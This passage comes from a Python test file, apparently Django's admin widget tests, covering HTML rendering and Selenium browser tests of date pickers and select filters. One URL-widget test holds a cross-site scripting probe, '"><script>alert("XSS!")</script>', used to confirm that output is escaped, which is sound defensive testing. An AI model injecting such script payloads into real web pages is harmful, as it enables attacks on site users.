# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', False)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple="multiple" name="test" class="selectfilter" '
'data-field-name="test\\" data-is-stacked="0">\n</select>'
)
def test_stacked_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', True)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple="multiple" name="test" class="selectfilterstacked" '
'data-field-name="test\\" data-is-stacked="1">\n</select>'
)
class AdminDateWidgetTest(SimpleTestCase):
def test_attrs(self):
"""
Ensure that user-supplied attrs are used.
Refs #12073.
"""
w = widgets.AdminDateWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="vDateField" name="test" size="10" />',
)
# pass attrs to widget
w = widgets.AdminDateWidget(attrs={'size': 20, 'class': 'myDateField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="myDateField" name="test" size="20" />',
)
class AdminTimeWidgetTest(SimpleTestCase):
def test_attrs(self):
"""
Ensure that user-supplied attrs are used.
Refs #12073.
"""
w = widgets.AdminTimeWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="vTimeField" name="test" size="8" />',
)
# pass attrs to widget
w = widgets.AdminTimeWidget(attrs={'size': 20, 'class': 'myTimeField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="myTimeField" name="test" size="20" />',
)
class AdminSplitDateTimeWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminSplitDateTime()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Date: <input value="2007-12-01" type="text" class="vDateField" '
'name="test_0" size="10" /><br />'
'Time: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8" /></p>'
)
def test_localization(self):
w = widgets.AdminSplitDateTime()
with self.settings(USE_L10N=True), translation.override('de-at'):
w.is_localized = True
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Datum: <input value="01.12.2007" type="text" '
'class="vDateField" name="test_0"size="10" /><br />'
'Zeit: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8" /></p>'
)
class AdminURLWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', ''),
'<input class="vURLField" name="test" type="url" />'
)
self.assertHTMLEqual(
w.render('test', 'http://example.com'),
'<p class="url">Currently:<a href="http://example.com">'
'http://example.com</a><br />'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example.com" /></p>'
)
def test_render_idn(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', 'http://example-äüö.com'),
'<p class="url">Currently: <a href="http://xn--example--7za4pnc.com">'
'http://example-äüö.com</a><br />'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com" /></p>'
)
def test_render_quoting(self):
# WARNING: Don't use assertHTMLEqual in that testcase!
# assertHTMLEqual will get rid of some escapes which are tested here!
w = widgets.AdminURLFieldWidget()
self.assertEqual(
w.render('test', 'http://example.com/<sometag>some text</sometag>'),
'<p class="url">Currently: '
'<a href="http://example.com/%3Csometag%3Esome%20text%3C/sometag%3E">'
'http://example.com/<sometag>some text</sometag></a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://example.com/<sometag>some text</sometag>" /></p>'
)
self.assertEqual(
w.render('test', 'http://example-äüö.com/<sometag>some text</sometag>'),
'<p class="url">Currently: '
'<a href="http://xn--example--7za4pnc.com/%3Csometag%3Esome%20text%3C/sometag%3E">'
'http://example-äüö.com/<sometag>some text</sometag></a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com/<sometag>some text</sometag>" /></p>'
)
self.assertEqual(
w.render('test', 'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"'),
'<p class="url">Currently: '
'<a href="http://www.example.com/%C3%A4%22%3E%3Cscript%3Ealert(%22XSS!%22)%3C/script%3E%22">'
'http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"</a><br />'
'Change: <input class="vURLField" name="test" type="url" '
'value="http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"" /></p>'
)
@override_settings(
PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls',
)
class AdminFileWidgetTests(TestDataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super(AdminFileWidgetTests, cls).setUpTestData()
band = models.Band.objects.create(name='Linkin Park')
cls.album = band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
def test_render(self):
w = widgets.AdminFileWidget()
self.assertHTMLEqual(
w.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id" /> '
'<label for="test-clear_id">Clear</label></span><br />'
'Change: <input type="file" name="test" /></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
self.assertHTMLEqual(
w.render('test', SimpleUploadedFile('test', b'content')),
'<input type="file" name="test" />',
)
def test_readonly_fields(self):
"""
File widgets should render as a link when they're marked "read only."
"""
self.client.login(username="super", password="secret")
response = self.client.get(reverse('admin:admin_widgets_album_change', args=(self.album.id,)))
self.assertContains(
response,
'<p><a href="%(STORAGE_URL)salbums/hybrid_theory.jpg">'
'albums\hybrid_theory.jpg</a></p>' % {'STORAGE_URL': default_storage.url('')},
html=True,
)
self.assertNotContains(
response,
'<input type="file" name="cover_art" id="id_cover_art" />',
html=True,
)
response = self.client.get(reverse('admin:admin_widgets_album_add'))
self.assertContains(
response,
'<p></p>',
html=True,
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ForeignKeyRawIdWidgetTest(TestCase):
def test_render(self):
band = models.Band.objects.create(name='Linkin Park')
band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
rel = models.Album._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', band.pk, attrs={}),
'<input type="text" name="test" value="%(bandpk)s" '
'class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/band/?_to_field=id" class="related-lookup" '
'id="lookup_id_test" title="Lookup"></a> <strong>Linkin Park</strong>'
% {'bandpk': band.pk}
)
def test_relations_to_non_primary_key(self):
# Check that ForeignKeyRawIdWidget works with fields which aren't
# related to the model's primary key.
apple = models.Inventory.objects.create(barcode=86, name='Apple')
models.Inventory.objects.create(barcode=22, name='Pear')
core = models.Inventory.objects.create(
barcode=87, name='Core', parent=apple
)
rel = models.Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', core.parent_id, attrs={}),
'<input type="text" name="test" value="86" '
'class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong>Apple</strong>'
)
def test_fk_related_model_not_in_admin(self):
# FK to a model not registered with admin site. Raw ID widget should
# have no magnifying glass link. See #16542
big_honeycomb = models.Honeycomb.objects.create(location='Old tree')
big_honeycomb.bee_set.create()
rel = models.Bee._meta.get_field('honeycomb').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('honeycomb_widget', big_honeycomb.pk, attrs={}),
'<input type="text" name="honeycomb_widget" value="%(hcombpk)s" />'
' <strong>Honeycomb object</strong>'
% {'hcombpk': big_honeycomb.pk}
)
def test_fk_to_self_model_not_in_admin(self):
# FK to self, not registered with admin site. Raw ID widget should have
# no magnifying glass link. See #16542
subject1 = models.Individual.objects.create(name='Subject #1')
models.Individual.objects.create(name='Child', parent=subject1)
rel = models.Individual._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('individual_widget', subject1.pk, attrs={}),
'<input type="text" name="individual_widget" value="%(subj1pk)s" />'
' <strong>Individual object</strong>'
% {'subj1pk': subject1.pk}
)
def test_proper_manager_for_label_lookup(self):
# see #9258
rel = models.Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
hidden = models.Inventory.objects.create(
barcode=93, name='Hidden', hidden=True
)
child_of_hidden = models.Inventory.objects.create(
barcode=94, name='Child of hidden', parent=hidden
)
self.assertHTMLEqual(
w.render('test', child_of_hidden.parent_id, attrs={}),
'<input type="text" name="test" value="93" class="vForeignKeyRawIdAdminField" />'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong>Hidden</strong>'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ManyToManyRawIdWidgetTest(TestCase):
def test_render(self):
band = models.Band.objects.create(name='Linkin Park')
m1 = models.Member.objects.create(name='Chester')
m2 = models.Member.objects.create(name='Mike')
band.members.add(m1, m2)
rel = models.Band._meta.get_field('members').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', [m1.pk, m2.pk], attrs={}), (
'<input type="text" name="test" value="%(m1pk)s,%(m2pk)s" class="vManyToManyRawIdAdminField" />'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % dict(m1pk=m1.pk, m2pk=m2.pk)
)
self.assertHTMLEqual(
w.render('test', [m1.pk]), (
'<input type="text" name="test" value="%(m1pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % dict(m1pk=m1.pk)
)
def test_m2m_related_model_not_in_admin(self):
# M2M relationship with model not registered with admin site. Raw ID
# widget should have no magnifying glass link. See #16542
consultor1 = models.Advisor.objects.create(name='Rockstar Techie')
c1 = models.Company.objects.create(name='Doodle')
c2 = models.Company.objects.create(name='Pear')
consultor1.companies.add(c1, c2)
rel = models.Advisor._meta.get_field('companies').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('company_widget1', [c1.pk, c2.pk], attrs={}),
'<input type="text" name="company_widget1" value="%(c1pk)s,%(c2pk)s" />' % {'c1pk': c1.pk, 'c2pk': c2.pk}
)
self.assertHTMLEqual(
w.render('company_widget2', [c1.pk]),
'<input type="text" name="company_widget2" value="%(c1pk)s" />' % {'c1pk': c1.pk}
)
class RelatedFieldWidgetWrapperTests(SimpleTestCase):
def test_no_can_add_related(self):
rel = models.Individual._meta.get_field('parent').remote_field
w = widgets.AdminRadioSelect()
# Used to fail with a name error.
w = widgets.RelatedFieldWidgetWrapper(w, rel, widget_admin_site)
self.assertFalse(w.can_add_related)
def test_select_multiple_widget_cant_change_delete_related(self):
rel = models.Individual._meta.get_field('parent').remote_field
widget = forms.SelectMultiple()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertFalse(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_on_delete_cascade_rel_cant_delete_related(self):
rel = models.Individual._meta.get_field('soulmate').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertTrue(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class DateTimePickerSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_show_hide_date_time_picker_widgets(self):
"""
Ensure that pressing the ESC key closes the date and time picker
widgets.
Refs #17064.
"""
from selenium.webdriver.common.keys import Keys
self.admin_login(username='super', password='secret', login_url='/')
        # Open a page that has date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# First, with the date picker widget ---------------------------------
# Check that the date picker is hidden
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'none')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Check that the date picker is visible
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'block')
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# Check that the date picker is hidden again
self.assertEqual(
self.get_css_value('#calendarbox0', 'display'), 'none')
# Then, with the time picker widget ----------------------------------
# Check that the time picker is hidden
self.assertEqual(
self.get_css_value('#clockbox0', 'display'), 'none')
# Click the time icon
self.selenium.find_element_by_id('clocklink0').click()
# Check that the time picker is visible
self.assertEqual(
self.get_css_value('#clockbox0', 'display'), 'block')
self.assertEqual(
[
x.text for x in
self.selenium.find_elements_by_xpath("//ul[@class='timelist']/li/a")
],
['Now', 'Midnight', '6 a.m.', 'Noon', '6 p.m.']
)
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# Check that the time picker is hidden again
self.assertEqual(
self.get_css_value('#clockbox0', 'display'), 'none')
def test_calendar_nonday_class(self):
"""
Ensure cells that are not days of the month have the `nonday` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
        # Open a page that has date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# make sure the first and last 6 cells have class nonday
for td in tds[:6] + tds[-6:]:
self.assertEqual(td.get_attribute('class'), 'nonday')
def test_calendar_selected_class(self):
"""
Ensure cell for the day in the input has the `selected` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
        # Open a page that has date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify the selected cell
selected = tds[6]
self.assertEqual(selected.get_attribute('class'), 'selected')
self.assertEqual(selected.text, '1')
def test_calendar_no_selected_class(self):
"""
Ensure no cells are given the selected class when the field is empty.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
        # Open a page that has date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify there are no cells with the selected class
selected = [td for td in tds if td.get_attribute('class') == 'selected']
self.assertEqual(len(selected), 0)
def test_calendar_show_date_from_input(self):
"""
        Ensure that the calendar shows the date from the input field for every
locale supported by django.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Enter test data
member = models.Member.objects.create(name='Bob', birthdate=datetime(1984, 5, 15), gender='M')
# Get month name translations for every locale
month_string = 'May'
path = os.path.join(os.path.dirname(import_module('django.contrib.admin').__file__), 'locale')
for language_code, language_name in settings.LANGUAGES:
try:
catalog = gettext.translation('djangojs', path, [language_code])
except IOError:
continue
if month_string in catalog._catalog:
month_name = catalog._catalog[month_string]
else:
month_name = month_string
# Get the expected caption
may_translation = month_name
expected_caption = '{0:s} {1:d}'.format(may_translation.upper(), 1984)
# Test with every locale
with override_settings(LANGUAGE_CODE=language_code, USE_L10N=True):
# Open a page that has a date picker widget
self.selenium.get('{}{}'.format(self.live_server_url,
reverse('admin:admin_widgets_member_change', args=(member.pk,))))
# Click on the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Make sure that the right month and year are displayed
self.wait_for_text('#calendarin0 caption', expected_caption)
class DateTimePickerSeleniumChromeTests(DateTimePickerSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerSeleniumIETests(DateTimePickerSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@skipIf(pytz is None, "this test requires pytz")
@override_settings(TIME_ZONE='Asia/Singapore')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class DateTimePickerShortcutsSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_date_time_picker_shortcuts(self):
"""
Ensure that date/time/datetime picker shortcuts work in the current time zone.
Refs #20663.
        This test case is fairly tricky: it relies on selenium still running the browser
in the default time zone "America/Chicago" despite `override_settings` changing
the time zone to "Asia/Singapore".
"""
self.admin_login(username='super', password='secret', login_url='/')
error_margin = timedelta(seconds=10)
        # If we are near a DST transition, we add an hour of error margin.
tz = pytz.timezone('America/Chicago')
utc_now = datetime.now(pytz.utc)
tz_yesterday = (utc_now - timedelta(days=1)).astimezone(tz).tzname()
tz_tomorrow = (utc_now + timedelta(days=1)).astimezone(tz).tzname()
if tz_yesterday != tz_tomorrow:
error_margin += timedelta(hours=1)
now = datetime.now()
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
self.selenium.find_element_by_id('id_name').send_keys('test')
# Click on the "today" and "now" shortcuts.
shortcuts = self.selenium.find_elements_by_css_selector(
'.field-birthdate .datetimeshortcuts')
for shortcut in shortcuts:
shortcut.find_element_by_tag_name('a').click()
# Check that there is a time zone mismatch warning.
# Warning: This would effectively fail if the TIME_ZONE defined in the
# settings has the same UTC offset as "Asia/Singapore" because the
# mismatch warning would be rightfully missing from the page.
self.selenium.find_elements_by_css_selector(
'.field-birthdate .timezonewarning')
# Submit the form.
self.selenium.find_element_by_tag_name('form').submit()
self.wait_page_loaded()
# Make sure that "now" in javascript is within 10 seconds
# from "now" on the server side.
member = models.Member.objects.get(name='test')
self.assertGreater(member.birthdate, now - error_margin)
self.assertLess(member.birthdate, now + error_margin)
class DateTimePickerShortcutsSeleniumChromeTests(DateTimePickerShortcutsSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerShortcutsSeleniumIETests(DateTimePickerShortcutsSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
# The above tests run with Asia/Singapore, which is on the positive side of
# UTC. Here we test with a timezone on the negative side.
@override_settings(TIME_ZONE='US/Eastern')
class DateTimePickerAltTimezoneSeleniumFirefoxTests(DateTimePickerShortcutsSeleniumFirefoxTests):
pass
class DateTimePickerAltTimezoneSeleniumChromeTests(DateTimePickerAltTimezoneSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerAltTimezoneSeleniumIETests(DateTimePickerAltTimezoneSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class HorizontalVerticalFilterSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
super(HorizontalVerticalFilterSeleniumFirefoxTests, self).setUp()
self.lisa = models.Student.objects.create(name='Lisa')
self.john = models.Student.objects.create(name='John')
self.bob = models.Student.objects.create(name='Bob')
self.peter = models.Student.objects.create(name='Peter')
self.jenny = models.Student.objects.create(name='Jenny')
self.jason = models.Student.objects.create(name='Jason')
self.cliff = models.Student.objects.create(name='Cliff')
self.arthur = models.Student.objects.create(name='Arthur')
self.school = models.School.objects.create(name='School of Awesome')
def assertActiveButtons(self, mode, field_name, choose, remove,
choose_all=None, remove_all=None):
choose_link = '#id_%s_add_link' % field_name
choose_all_link = '#id_%s_add_all_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
remove_all_link = '#id_%s_remove_all_link' % field_name
self.assertEqual(self.has_css_class(choose_link, 'active'), choose)
self.assertEqual(self.has_css_class(remove_link, 'active'), remove)
if mode == 'horizontal':
self.assertEqual(self.has_css_class(choose_all_link, 'active'), choose_all)
self.assertEqual(self.has_css_class(remove_all_link, 'active'), remove_all)
def execute_basic_operations(self, mode, field_name):
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
choose_all_link = 'id_%s_add_all_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
remove_all_link = 'id_%s_remove_all_link' % field_name
# Initial positions ---------------------------------------------------
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id)])
self.assertActiveButtons(mode, field_name, False, False, True, True)
# Click 'Choose all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(choose_all_link).click()
elif mode == 'vertical':
            # There's no 'Choose all' button in vertical mode, so individually
# select all options and click 'Choose'.
for option in self.selenium.find_elements_by_css_selector(from_box + ' > option'):
option.click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertActiveButtons(mode, field_name, False, False, False, True)
# Click 'Remove all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(remove_all_link).click()
elif mode == 'vertical':
            # There's no 'Remove all' button in vertical mode, so individually
# select all options and click 'Remove'.
for option in self.selenium.find_elements_by_css_selector(to_box + ' > option'):
option.click()
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectOptions(from_box,
[str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertSelectOptions(to_box, [])
self.assertActiveButtons(mode, field_name, False, False, True, False)
# Choose some options ------------------------------------------------
from_lisa_select_option = self.get_select_option(from_box, str(self.lisa.id))
# Check the title attribute is there for tool tips: ticket #20821
self.assertEqual(from_lisa_select_option.get_attribute('title'), from_lisa_select_option.get_attribute('text'))
from_lisa_select_option.click()
self.get_select_option(from_box, str(self.jason.id)).click()
self.get_select_option(from_box, str(self.bob.id)).click()
self.get_select_option(from_box, str(self.john.id)).click()
self.assertActiveButtons(mode, field_name, True, False, True, False)
self.selenium.find_element_by_id(choose_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.bob.id),
str(self.jason.id), str(self.john.id)])
# Check the tooltip is still there after moving: ticket #20821
to_lisa_select_option = self.get_select_option(to_box, str(self.lisa.id))
self.assertEqual(to_lisa_select_option.get_attribute('title'), to_lisa_select_option.get_attribute('text'))
# Remove some options -------------------------------------------------
self.get_select_option(to_box, str(self.lisa.id)).click()
self.get_select_option(to_box, str(self.bob.id)).click()
self.assertActiveButtons(mode, field_name, False, True, True, True)
self.selenium.find_element_by_id(remove_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)])
self.assertSelectOptions(to_box,
[str(self.jason.id), str(self.john.id)])
# Choose some more options --------------------------------------------
self.get_select_option(from_box, str(self.arthur.id)).click()
self.get_select_option(from_box, str(self.cliff.id)).click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)])
self.assertSelectOptions(to_box,
[str(self.jason.id), str(self.john.id),
str(self.arthur.id), str(self.cliff.id)])
def test_basic(self):
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get('%s%s' % (
self.live_server_url, reverse('admin:admin_widgets_school_change', args=(self.school.id,))))
self.wait_page_loaded()
self.execute_basic_operations('vertical', 'students')
self.execute_basic_operations('horizontal', 'alumni')
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_loaded()
self.school = models.School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()),
[self.arthur, self.cliff, self.jason, self.john])
self.assertEqual(list(self.school.alumni.all()),
[self.arthur, self.cliff, self.jason, self.john])
def test_filter(self):
"""
Ensure that typing in the search box filters out options displayed in
the 'from' box.
"""
from selenium.webdriver.common.keys import Keys
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_school_change', args=(self.school.id,))))
for field_name in ['students', 'alumni']:
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = '#id_%s_add_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
input = self.selenium.find_element_by_css_selector('#id_%s_input' % field_name)
# Initial values
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
# Typing in some characters filters out non-matching options
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys('R')
self.assertSelectOptions(from_box, [str(self.arthur.id)])
# Clearing the text box makes the other options reappear
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
# -----------------------------------------------------------------
# Check that choosing a filtered option sends it properly to the
# 'to' box.
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
self.get_select_option(from_box, str(self.jason.id)).click()
self.selenium.find_element_by_css_selector(choose_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id),
str(self.jason.id)])
self.get_select_option(to_box, str(self.lisa.id)).click()
self.selenium.find_element_by_css_selector(remove_link).click()
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.lisa.id)])
self.assertSelectOptions(to_box,
[str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE]) # Clear text box
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jenny.id),
str(self.john.id), str(self.lisa.id)])
self.assertSelectOptions(to_box,
[str(self.peter.id), str(self.jason.id)])
# -----------------------------------------------------------------
# Check that pressing enter on a filtered option sends it properly
# to the 'to' box.
self.get_select_option(to_box, str(self.jason.id)).click()
self.selenium.find_element_by_css_selector(remove_link).click()
input.send_keys('ja')
self.assertSelectOptions(from_box, [str(self.jason.id)])
input.send_keys([Keys.ENTER])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE, Keys.BACK_SPACE])
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_loaded()
self.school = models.School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()),
[self.jason, self.peter])
self.assertEqual(list(self.school.alumni.all()),
[self.jason, self.peter])
class HorizontalVerticalFilterSeleniumChromeTests(HorizontalVerticalFilterSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class HorizontalVerticalFilterSeleniumIETests(HorizontalVerticalFilterSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminRawIdWidgetSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
